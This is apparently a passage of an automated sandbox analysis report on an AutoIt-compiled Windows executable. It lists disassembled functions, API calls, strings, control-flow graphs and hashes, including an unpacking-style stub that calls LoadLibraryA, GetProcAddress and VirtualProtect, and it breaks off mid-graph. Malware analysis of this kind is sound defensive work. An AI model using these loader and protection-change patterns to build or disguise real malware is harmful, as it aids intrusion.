                    • Instruction Fuzzy Hash: 3D115A75200701AFE7218B65DC58F6B7BB9EFC9B51F20816CF41A862A0DBA1E801C6A1
                    Function 00DBC0B0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1191 dbc0b0-dbc0bd 1192 dbc0ca-dbc0cf 1191->1192 1193 dbc0d1 1192->1193 1194 dbc0d3 1193->1194 1195 dbc0c0-dbc0c5 1193->1195 1197 dbc0d8-dbc0da 1194->1197 1196 dbc0c6-dbc0c8 1195->1196 1196->1192 1196->1193 1198 dbc0dc-dbc0e1 1197->1198 1199 dbc0e3-dbc0e7 1197->1199 1198->1199 1200 dbc0e9 1199->1200 1201 dbc0f4-dbc0f7 1199->1201 1202 dbc0eb-dbc0f2 1200->1202 1203 dbc113-dbc118 1200->1203 1204 dbc0f9-dbc0fe 1201->1204 1205 dbc100-dbc102 1201->1205 1202->1201 1202->1203 1206 dbc12b-dbc12d 1203->1206 1207 dbc11a-dbc123 1203->1207 1204->1205 1205->1197 1210 dbc12f-dbc134 1206->1210 1211 dbc136 1206->1211 1208 dbc19a-dbc19d 1207->1208 1209 dbc125-dbc129 1207->1209 1212 dbc1a2-dbc1a5 1208->1212 1209->1211 1210->1211 1213 dbc138-dbc13b 1211->1213 1214 dbc104-dbc106 1211->1214 1215 dbc1a7-dbc1a9 1212->1215 1216 dbc13d-dbc142 1213->1216 1217 dbc144 1213->1217 1218 dbc108-dbc10d 1214->1218 1219 dbc10f-dbc111 1214->1219 1215->1212 1221 dbc1ab-dbc1ae 1215->1221 1216->1217 1217->1214 1222 dbc146-dbc148 1217->1222 1218->1219 1220 dbc165-dbc174 1219->1220 1223 dbc176-dbc17d 1220->1223 1224 dbc184-dbc191 1220->1224 1221->1212 1225 dbc1b0-dbc1cc 1221->1225 1226 dbc14a-dbc14f 1222->1226 1227 dbc151-dbc155 1222->1227 1223->1223 1228 dbc17f 1223->1228 1224->1224 1229 dbc193-dbc195 1224->1229 1225->1215 1230 dbc1ce 1225->1230 1226->1227 1227->1222 1231 dbc157 1227->1231 1228->1196 1229->1196 1232 dbc1d4-dbc1d8 1230->1232 1233 dbc159-dbc160 1231->1233 1234 dbc162 1231->1234 1235 dbc1da-dbc1f0 LoadLibraryA 1232->1235 1236 dbc21f-dbc222 1232->1236 1233->1222 1233->1234 1234->1220 1238 dbc1f1-dbc1f6 1235->1238 1237 dbc225-dbc22c 1236->1237 1239 dbc22e-dbc230 1237->1239 1240 dbc250-dbc280 VirtualProtect * 2 1237->1240 1238->1232 1241 dbc1f8-dbc1fa 1238->1241 1242 dbc243-dbc24e 1239->1242 1243 dbc232-dbc241 1239->1243 1244 dbc284-dbc288 1240->1244 1245 dbc1fc-dbc202 1241->1245 1246 dbc203-dbc210 GetProcAddress 1241->1246 1242->1243 1243->1237 1244->1244 1249 dbc28a 1244->1249 1245->1246 1247 dbc219 ExitProcess 1246->1247 1248 dbc212-dbc217 1246->1248 1248->1238
                    APIs
                    • LoadLibraryA.KERNEL32(?), ref: 00DBC1EA
                    • GetProcAddress.KERNEL32(?,00DB5FF9), ref: 00DBC208
                    • ExitProcess.KERNEL32(?,00DB5FF9), ref: 00DBC219
                    • VirtualProtect.KERNELBASE(00C70000,00001000,00000004,?,00000000), ref: 00DBC267
                    • VirtualProtect.KERNELBASE(00C70000,00001000), ref: 00DBC27C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                    • String ID:
                    • API String ID: 1996367037-0
                    • Opcode ID: ab8aa4c398687c74529e91f016997aee44f179a03fe8a5bde44d75714b94c903
                    • Instruction ID: e53467f0d39211fcf1f3b6b5ba91adb074e540965c95abf126e3dc643561a5a1
                    • Opcode Fuzzy Hash: ab8aa4c398687c74529e91f016997aee44f179a03fe8a5bde44d75714b94c903
                    • Instruction Fuzzy Hash: 9E51E372A64352DBD7209ABCCC806E4B7A4FB5136472C1738D5E3D73C6EB9058068774
                    Function 00C7FE40 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID:
                    • API String ID: 3964851224-0
                    • Opcode ID: 42bb8d12812b916e871e38c5b5d9f2769c913c4a625defd24fefad59dbc86b4b
                    • Instruction ID: 05aeae16543033a087ccd4f87b16963ff06d003c9b3ca32b1c65772ca84018be
                    • Opcode Fuzzy Hash: 42bb8d12812b916e871e38c5b5d9f2769c913c4a625defd24fefad59dbc86b4b
                    • Instruction Fuzzy Hash: 6F928A706083418FD764DF24C484B6AB7E1BF84308F24896DF99A8B362D771ED49CB96
                    Function 00CD4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00CAE7C1), ref: 00CD46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00CD46B7
                    • FindClose.KERNEL32(00000000), ref: 00CD46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 02bdcda8a747e1573cf97668be1b9950595c75cbfdfa5aea50b07e110a65a9ab
                    • Instruction ID: 4d7e048f5dd93185ff8b9df6ccfc1b3869f077b030c9b77906399594beb34b18
                    • Opcode Fuzzy Hash: 02bdcda8a747e1573cf97668be1b9950595c75cbfdfa5aea50b07e110a65a9ab
                    • Instruction Fuzzy Hash: 7EE0D8314104005B42146738EC4D5FE775CDE06335F10071AFB36C12E0E7B09955C596
                    Function 00C7E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00CB428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: 90d5fcd72abeaca411e5f9a522b190652d786a5467a0eed597b7bfb762030c6c
                    • Instruction ID: 7c1eb1ff51563e1e2730b8173e4957c6f91a0b796c82e5fd1e58130cabf22c6c
                    • Opcode Fuzzy Hash: 90d5fcd72abeaca411e5f9a522b190652d786a5467a0eed597b7bfb762030c6c
                    • Instruction Fuzzy Hash: 32A28076A04215CFCB24CF59C480AAEB7B1FF58310F64C1A9E91AAB352D731ED42DB91
                    Function 00C80B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C80BBB
                    • timeGetTime.WINMM ref: 00C80E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C80FB3
                    • TranslateMessage.USER32(?), ref: 00C80FC7
                    • DispatchMessageW.USER32(?), ref: 00C80FD5
                    • Sleep.KERNEL32(0000000A), ref: 00C80FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00C8105A
                    • DestroyWindow.USER32 ref: 00C81066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C81080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00CB52AD
                    • TranslateMessage.USER32(?), ref: 00CB608A
                    • DispatchMessageW.USER32(?), ref: 00CB6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 72c35bd73468eae8c61301f6075fdd577d1ea047d16e834da7d645ac6e6cbf08
                    • Instruction ID: 7d95d5aa03a03f14f3ec764b0193977ce47cc8e9b4b82467c18e13daa8b7bd1a
                    • Opcode Fuzzy Hash: 72c35bd73468eae8c61301f6075fdd577d1ea047d16e834da7d645ac6e6cbf08
                    • Instruction Fuzzy Hash: D3B2BD70608741DFD724DF24C884BAEB7E4FF84304F24891DE59A872A1CB71E989DB96
                    Function 00CD93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00CD91E9: __time64.LIBCMT ref: 00CD91F3
                      • Part of subcall function 00C75045: _fseek.LIBCMT ref: 00C7505D
                    • __wsplitpath.LIBCMT ref: 00CD94BE
                      • Part of subcall function 00C9432E: __wsplitpath_helper.LIBCMT ref: 00C9436E
                    • _wcscpy.LIBCMT ref: 00CD94D1
                    • _wcscat.LIBCMT ref: 00CD94E4
                    • __wsplitpath.LIBCMT ref: 00CD9509
                    • _wcscat.LIBCMT ref: 00CD951F
                    • _wcscat.LIBCMT ref: 00CD9532
                      • Part of subcall function 00CD922F: _memmove.LIBCMT ref: 00CD9268
                      • Part of subcall function 00CD922F: _memmove.LIBCMT ref: 00CD9277
                    • _wcscmp.LIBCMT ref: 00CD9479
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AAE
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CD96DC
                    • _wcsncpy.LIBCMT ref: 00CD974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00CD9785
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CD979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CD97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CD97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: d828b0d99df2f7dacb41a315b7d7695186dfaeba95a08357435273797be51898
                    • Instruction ID: 97aa5c837b443269ac01bed977e8ced49cbe2bbb55bd3c828bcea3fb70d63484
                    • Opcode Fuzzy Hash: d828b0d99df2f7dacb41a315b7d7695186dfaeba95a08357435273797be51898
                    • Instruction Fuzzy Hash: 86C12BB5D00229AACF21DF95CC85EEEB7BDEF45300F0040AAF609E7251EB709A459F65
                    Function 00C771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00C74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D362F8,?,00C737C0,?), ref: 00C74882
                      • Part of subcall function 00C9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C772C5), ref: 00C90771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C77308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CAECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CAED32
                    • RegCloseKey.ADVAPI32(?), ref: 00CAED70
                    • _wcscat.LIBCMT ref: 00CAEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 42930e491e983040162462c77046826318d3fdeda96d9b6d789038c2f84b90c3
                    • Instruction ID: 9a5b40c41ad0cc3d9bfdad762d7d3fdde8a08d67068b0d5a62ba10dc35a6bf4b
                    • Opcode Fuzzy Hash: 42930e491e983040162462c77046826318d3fdeda96d9b6d789038c2f84b90c3
                    • Instruction Fuzzy Hash: 0571AFB54093059EC724EF65EC819ABB7E8FF45340F44452EF459C32A0DB709948DBA6
                    Function 00C73A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C73A71
                    • LoadIconW.USER32(00000063), ref: 00C73A88
                    • LoadIconW.USER32(000000A4), ref: 00C73A9A
                    • LoadIconW.USER32(000000A2), ref: 00C73AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C73AD2
                    • RegisterClassExW.USER32(?), ref: 00C73B28
                      • Part of subcall function 00C73041: GetSysColorBrush.USER32(0000000F), ref: 00C73074
                      • Part of subcall function 00C73041: RegisterClassExW.USER32(00000030), ref: 00C7309E
                      • Part of subcall function 00C73041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                      • Part of subcall function 00C73041: LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                    • String ID: #$0$AutoIt v3
                    • API String ID: 2880975755-4155596026
                    • Opcode ID: 5a4fb9e2896ee30c675d2e3dc44e31ccb7f090433c37ca11a522b4b73954819a
                    • Instruction ID: f20817129216d0e36c344cbc90db08e028792fefc2dc77292d10d07bf457e728
                    • Opcode Fuzzy Hash: 5a4fb9e2896ee30c675d2e3dc44e31ccb7f090433c37ca11a522b4b73954819a
                    • Instruction Fuzzy Hash: 7C214D74900308BFDB109FA4EC49B9E7BB4FB08710F11812AF504E63A1D7B69654DF69
                    Function 00C73778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 829bbb9099120a452586e06c3ca7d82f015aa186fa59b36a1816ce6a834d5c14
                    • Instruction ID: 20ba7b3589dc82d8c95bfc21bc5f26fc274947825d09a0b79ace789d958cf647
                    • Opcode Fuzzy Hash: 829bbb9099120a452586e06c3ca7d82f015aa186fa59b36a1816ce6a834d5c14
                    • Instruction Fuzzy Hash: A9A1607681025DABDF04EBA0CC95EEEB778FF14300F048429F51AA7191DF749A09EB61
                    Function 00C73016 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70registrywindowclipboardCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73074
                    • RegisterClassExW.USER32(00000030), ref: 00C7309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                    • LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: a8123871e4e69d943f7cce23d8d65e2497b86531c7b7f28eecbc18c3fadf45ab
                    • Instruction ID: d20120029e578b9f8e3b4a56ba9c5a5ddcb0e6338ee66e774367af48841e9790
                    • Opcode Fuzzy Hash: a8123871e4e69d943f7cce23d8d65e2497b86531c7b7f28eecbc18c3fadf45ab
                    • Instruction Fuzzy Hash: 423106B1941309AFDB409FA4DC85B9DBBF0FF09310F10852EE550E62A0D7B54586CF61
                    Function 00C73041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73074
                    • RegisterClassExW.USER32(00000030), ref: 00C7309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                    • LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: 53e59a620f30b47c4155d968b7cf7833b7eb8a9ba7d4ed377252040435e8e1e7
                    • Instruction ID: 1367c034c96fe5f1d23693fb2f78b97b7071e95db7dd44e47c7d9123a5774ff3
                    • Opcode Fuzzy Hash: 53e59a620f30b47c4155d968b7cf7833b7eb8a9ba7d4ed377252040435e8e1e7
                    • Instruction Fuzzy Hash: 8D21A5B5900318AFDB009F94E889B9DBBF4FB08700F10812AEA10E63A0D7B14545CFA5
                    Function 00CE9E38 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 948 ce9e38-ce9e72 949 ce9e78-ce9e7d 948->949 950 cea1d9-cea1dd 948->950 949->950 952 ce9e83-ce9e8c call cc6543 949->952 951 cea1e2-cea1e3 950->951 953 cea1e4 call ce96db 951->953 958 ce9e8e-ce9e96 952->958 959 ce9e9f-ce9ea5 952->959 957 cea1e9-cea1ef 953->957 960 ce9e98-ce9e9a 958->960 961 ce9eab 959->961 962 ce9ea7-ce9ea9 959->962 960->953 963 ce9ead-ce9eb5 961->963 962->963 964 ce9eb7-ce9ec1 963->964 965 ce9ec3-ce9edc call cc7a1e 963->965 964->960 968 ce9ede-ce9ee3 965->968 969 ce9ee8-ce9eef 965->969 968->951 970 ce9f3e-ce9f6c call c90fa5 969->970 971 ce9ef1-ce9efd 969->971 976 ce9f6e-ce9f7c 970->976 977 ce9f95-ce9f97 970->977 971->970 973 ce9eff-ce9f0c call cc76c5 971->973 978 ce9f11-ce9f16 973->978 979 ce9f7e 976->979 980 ce9f9a-ce9fa1 976->980 977->980 978->970 981 ce9f18-ce9f1f 978->981 984 ce9f80-ce9f8b call cc7096 979->984 985 ce9fd2-ce9fd9 980->985 986 ce9fa3-ce9fad 980->986 982 ce9f2e-ce9f35 981->982 983 ce9f21-ce9f28 981->983 982->970 989 ce9f37 982->989 983->982 988 ce9f2a 983->988 1001 ce9f8d-ce9f93 984->1001 990 ce9fdb-ce9fe2 985->990 991 cea058-cea065 985->991 987 ce9faf-ce9fc5 call cc70dc 986->987 1003 ce9fc7-ce9fcf 987->1003 988->982 989->970 990->991 994 ce9fe4-ce9ff4 990->994 996 cea067-cea071 991->996 997 cea074-cea0a3 VariantInit call c93020 991->997 1000 ce9ff5-ce9ffd 994->1000 996->997 1006 cea0a8-cea0ab 997->1006 1007 cea0a5-cea0a6 997->1007 1004 ce9fff-cea01c VariantClear 1000->1004 1005 cea04a-cea053 1000->1005 1001->980 1003->985 1008 cea01e-cea032 SysAllocString 1004->1008 1009 cea035-cea045 1004->1009 1005->1000 1010 cea055 1005->1010 1011 cea0ac-cea0bd call ccdcec 1006->1011 1007->1011 1008->1009 1009->1005 1012 cea047 1009->1012 1010->991 1013 cea0c0-cea0c5 1011->1013 1012->1005 1014 cea0c7-cea0cb 1013->1014 1015 cea103-cea105 1013->1015 1016 cea0cd-cea100 1014->1016 1017 cea11a-cea11e 1014->1017 1018 cea12d-cea150 call cc6aa3 call cd7804 1015->1018 1019 cea107-cea10e 1015->1019 1016->1015 1020 cea11f-cea128 call ce96db 1017->1020 1028 cea1bc-cea1cb VariantClear 1018->1028 1032 cea152-cea15b 1018->1032 1019->1017 1022 cea110-cea118 1019->1022 1020->1028 1022->1020 1030 cea1cd-cea1d0 call ccdf93 1028->1030 1031 cea1d5-cea1d7 1028->1031 1030->1031 1031->957 1034 